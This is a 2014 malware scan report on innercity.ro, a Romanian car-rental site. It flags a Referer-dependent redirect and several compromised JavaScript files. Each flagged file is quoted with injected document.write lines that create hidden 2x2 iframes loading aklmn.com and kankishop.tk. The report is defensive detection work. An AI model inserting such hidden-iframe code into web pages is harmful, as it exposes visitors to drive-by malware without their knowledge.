Malicious/Suspicious Redirects
Request | Server response | Status |
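URL: http://www.innercity.ro/ (request sent with a search-engine Referer header, imitating a visitor arriving from search results) GET / HTTP/1.1 Host: www.innercity.ro Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 19 Sep 2014 03:12:24 GMT Location: http://aklmn.com/mzod.html?h=606169 Server: Apache Vary: Accept-Encoding Content-Length: 219 Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: the same URL is listed under "Scanned pages/files" with a 200 OK response, so the redirect appears to depend on the request headers (here, the Referer); a check made without a search-engine Referer would not show it.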
Scanned pages/files
Request | Server response | Status |
http://www.innercity.ro/ | 200 OK Content-Length: 14553 Content-Type: text/html | clean |
http://www.innercity.ro/js/menu.js | 200 OK Content-Length: 1005 Content-Type: application/x-javascript | malicious |
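Malicious code (confirmed by antivirus engines; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
This statement writes a 2x2-pixel iframe into any page that loads the script, so the visitor's browser fetches the third-party URL with no visible element. The file excerpt that follows appears to be truncated by the scanner (it breaks off mid-statement) and ends with a second injected iframe pointing at a different host.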
function assignHoverNav() { var menu = document.getElementById('main-nav'); if (!menu) return false; var index=0 var elems = menu.getElementsByTagName('li'); if (!elems) return false; for(index=0;index<elems.length;index++) { var li = elems[index]; li.o window.status = "Over"; } li.onmouseout = function () { window.status = "Out"; this.className=this.className.replace("over", ""); } } } if (window.attachEvent) window.attachEvent("onload", assignHoverNav); else window.onload = assignHoverNav; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> | ||
http://www.innercity.ro/js/functii.js | 200 OK Content-Length: 684 Content-Type: application/x-javascript | malicious |
Malicious code (confirmed by antivirus engines; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
function schimba(img_name) { document.imagine_mare.src = img_name; } function schimba_i(img_name) { document.imagine_mare.src = img_name; } var msg; function stergeText(inName) { msg = inName.value; inName.value = ""; } function adText(inName) { msg2 = inName.value; if(msg2=="") { inName.value = msg; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> | ||
http://www.innercity.ro/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57552 Content-Type: application/x-javascript | malicious |
Malicious code (confirmed by antivirus engines; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);i document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> | ||
http://www.innercity.ro/js/jquery.jcarousel.pack.js | 200 OK Content-Length: 9193 Content-Type: application/x-javascript | malicious |
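Malicious code (confirmed by antivirus engines; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
The packed eval(function(p,a,c,k,e,r){...}) wrapper in the excerpt that follows is consistent with the file's ".pack.js" name; the antivirus reports below cite only the two hidden iframes, not the packer.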
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> | ||
http://www.innercity.ro/js/carousel.js | 200 OK Content-Length: 1552 Content-Type: application/x-javascript | malicious |
Malicious code (confirmed by antivirus engines; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
function mycarousel_initCallback(carousel) { carousel.buttonNext.bind('click', function() { carousel.startAuto(0); }); carousel.buttonPrev.bind('click', function() { carousel.startAuto(0); }); carousel.clip.hover(function() { carousel.stop }); jQuery('#mycarouse2').jcarousel({ auto: 4, wrap: 'last', vertical: false, scroll: 1, animation: '100', buttonNextHTML: null, buttonPrevHTML: null, initCallback: mycarousel_initCallback }); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> | ||
http://www.innercity.ro/text.php?text=3 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:27 GMT Location: http://www.innercity.ro/firma-inchirieri-auto-innercity Server: Apache Vary: Accept-Encoding Content-Length: 263 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/firma-inchirieri-auto-innercity | 200 OK Content-Length: 13081 Content-Type: text/html | clean |
http://www.innercity.ro/js/lytebox.js | 200 OK Content-Length: 39872 Content-Type: application/x-javascript | malicious |
Malicious code (confirmed by antivirus engines; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169></iframe>');
Array.prototype.removeDuplicates = function () { for (var i = 1; i < this.length; i++) { if (this[i][0] == this[i-1][0]) { this.splice(i,1); } } } Array.prototype.empty = function () { for (var i = 0; i <= this.length; i++) { this.shift(); } } String.prototype.trim = function () { return this.replace(/^\s+|\s+ } }; if (window.addEventListener) { window.addEventListener("load",initLytebox,false); } else if (window.attachEvent) { window.attachEvent("onload",initLytebox); } else { window.onload = function() {initLytebox();} } function initLytebox() { myLytebox = new LyteBox(); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://aklmn.com/mzod.html?j=606169 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://aklmn.com/mzod.html?j=606169> Hidden iFrame found. size: 2x2 src: http://kankishop.tk/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kankishop.tk/hmod.html> | ||
http://www.innercity.ro/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:28 GMT Location: http://www.innercity.ro/ Server: Apache Vary: Accept-Encoding Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 19 Sep 2014 03:12:28 GMT Location: http://www.innercity.ro/eroare.php Server: Apache Vary: Accept-Encoding Content-Length: 218 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/eroare.php | 200 OK Content-Length: 5751 Content-Type: text/html | clean |
http://www.innercity.ro/drivers_team.php | 200 OK Content-Length: 7978 Content-Type: text/html | clean |
http://www.innercity.ro/text.php?text=2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:29 GMT Location: http://www.innercity.ro/certificare Server: Apache Vary: Accept-Encoding Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/certificare | 200 OK Content-Length: 9526 Content-Type: text/html | clean |
http://www.innercity.ro/references.php | 200 OK Content-Length: 7122 Content-Type: text/html | clean |
http://www.innercity.ro/text.php?text=5 | 200 OK Content-Length: 10381 Content-Type: text/html | clean |
http://www.innercity.ro/text.php?text=6 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:30 GMT Location: http://www.innercity.ro/stiri Server: Apache Vary: Accept-Encoding Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/stiri | 200 OK Content-Length: 17124 Content-Type: text/html | clean |
http://www.innercity.ro/text.php?text=7 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 03:12:31 GMT Location: http://www.innercity.ro/transfer-aeroport Server: Apache Vary: Accept-Encoding Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.innercity.ro/transfer-aeroport | 200 OK Content-Length: 13010 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=innercity.ro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://innercity.ro/
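Result: innercity.ro is not infected or malware details are not published yet.
Result: innercity.ro is not infected or malware details are not published yet.
Note: a "not listed" result from either blacklist does not contradict the findings above. The scan itself retrieved the 302 redirect and the injected iframes from the site's JavaScript files, and blacklist entries can lag behind a compromise.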